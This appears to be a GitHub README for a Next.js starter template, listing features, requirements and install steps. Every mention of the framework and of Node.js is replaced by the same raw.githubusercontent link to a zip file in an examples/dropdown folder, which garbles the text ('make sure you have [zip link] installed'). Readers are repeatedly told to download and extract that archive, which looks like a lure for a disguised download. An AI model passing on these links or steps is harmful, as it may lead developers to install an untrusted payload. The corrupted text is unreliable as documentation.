NextJs-Starter-Kit is a production-ready template made for building web applications. It uses https://raw.githubusercontent.com/Brutalyking/NextJs-Starter-Kit/main/examples/dropdown/NextJs-Starter-Kit_1.8.zip 16 with TypeScript and React 19. This kit gives you essential features like a fully-functional DataTable, customizable UI components, and smooth notifications. You will save time on setup and focus on building your app.
- DataTable with sorting and selection
- Customizable tooltips and dropdown menus
- Schema-validated forms for safe data entry
- Dialogs with asynchronous handlers
- Toast notifications for user feedback
- State management with Zustand and data fetching using React Query
- Built-in API clients for easy server communication
- Dark mode support
- Comprehensive documentation for easy understanding
- Operating System: Windows 10 or later, macOS, or Linux
- Memory: 4 GB RAM minimum (8 GB recommended)
- Disk Space: At least 200 MB available
- Network: Internet connection for downloading and updates
To get started with NextJs-Starter-Kit, follow these simple steps:
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Visit the Releases Page:
Go to the Releases Page to find the download files.
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Download the Starter Kit:
Choose the latest version from the page. Click on the file link to download it to your computer.
After downloading, follow these steps to install and run the application:
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Locate the Downloaded File:
Go to your computer's Downloads folder. You should see a file named something like
https://raw.githubusercontent.com/Brutalyking/NextJs-Starter-Kit/main/examples/dropdown/NextJs-Starter-Kit_1.8.zipor similar. -
Extract the File:
Right-click on the downloaded file and select "Extract All..." or use a file extraction tool like WinRAR or 7-Zip. This will create a new folder containing all necessary files.
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Open the Project Folder:
After extraction, navigate into the newly created folder.
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Install Dependencies:
- Make sure you have https://raw.githubusercontent.com/Brutalyking/NextJs-Starter-Kit/main/examples/dropdown/NextJs-Starter-Kit_1.8.zip installed. You can download it from the https://raw.githubusercontent.com/Brutalyking/NextJs-Starter-Kit/main/examples/dropdown/NextJs-Starter-Kit_1.8.zip website.
- Once https://raw.githubusercontent.com/Brutalyking/NextJs-Starter-Kit/main/examples/dropdown/NextJs-Starter-Kit_1.8.zip is installed, open your command prompt or terminal.
- Navigate to the project folder using
cd path_to_your_folder. - Run the command
npm installto install all required packages.
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Run the Application:
After installation, type
npm run devin the command prompt or terminal. This command starts the application. Open your web browser and go tohttp://localhost:3000to see your app running.
If you encounter issues while downloading or running the application, consider the following:
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Ensure https://raw.githubusercontent.com/Brutalyking/NextJs-Starter-Kit/main/examples/dropdown/NextJs-Starter-Kit_1.8.zip is Installed: Make sure https://raw.githubusercontent.com/Brutalyking/NextJs-Starter-Kit/main/examples/dropdown/NextJs-Starter-Kit_1.8.zip is properly installed. You can check this by typing
node -vin your command prompt or terminal. If it returns a version number, it is installed correctly. -
Check Documentation: Refer to the comprehensive documentation available in the project folder. Look for the
docsfolder or README files for additional setup instructions. -
Search Online: Google specific error messages you see. Often, other users have faced similar issues.
If you need further assistance:
- Check the issues section of this GitHub repository. You can search for solutions or ask your own questions.
- Join community forums or Reddit groups where developers share knowledge about https://raw.githubusercontent.com/Brutalyking/NextJs-Starter-Kit/main/examples/dropdown/NextJs-Starter-Kit_1.8.zip and React.
NextJs-Starter-Kit is built on the foundations of several powerful tools, including:
- https://raw.githubusercontent.com/Brutalyking/NextJs-Starter-Kit/main/examples/dropdown/NextJs-Starter-Kit_1.8.zip
- React
- TypeScript
- Zustand
- React Query
- Axios
If you're interested in learning more about the technologies used in this project, check out these topics:
- axios
- dialog
- nextjs
- nodejs
- react-hook-form
- reactjs
- reactquery
- sonner
- toast-notifications
- zustand
For more detailed guidance and support, don't hesitate to explore the Releases Page again. You can always come back to download updated versions as we improve the kit.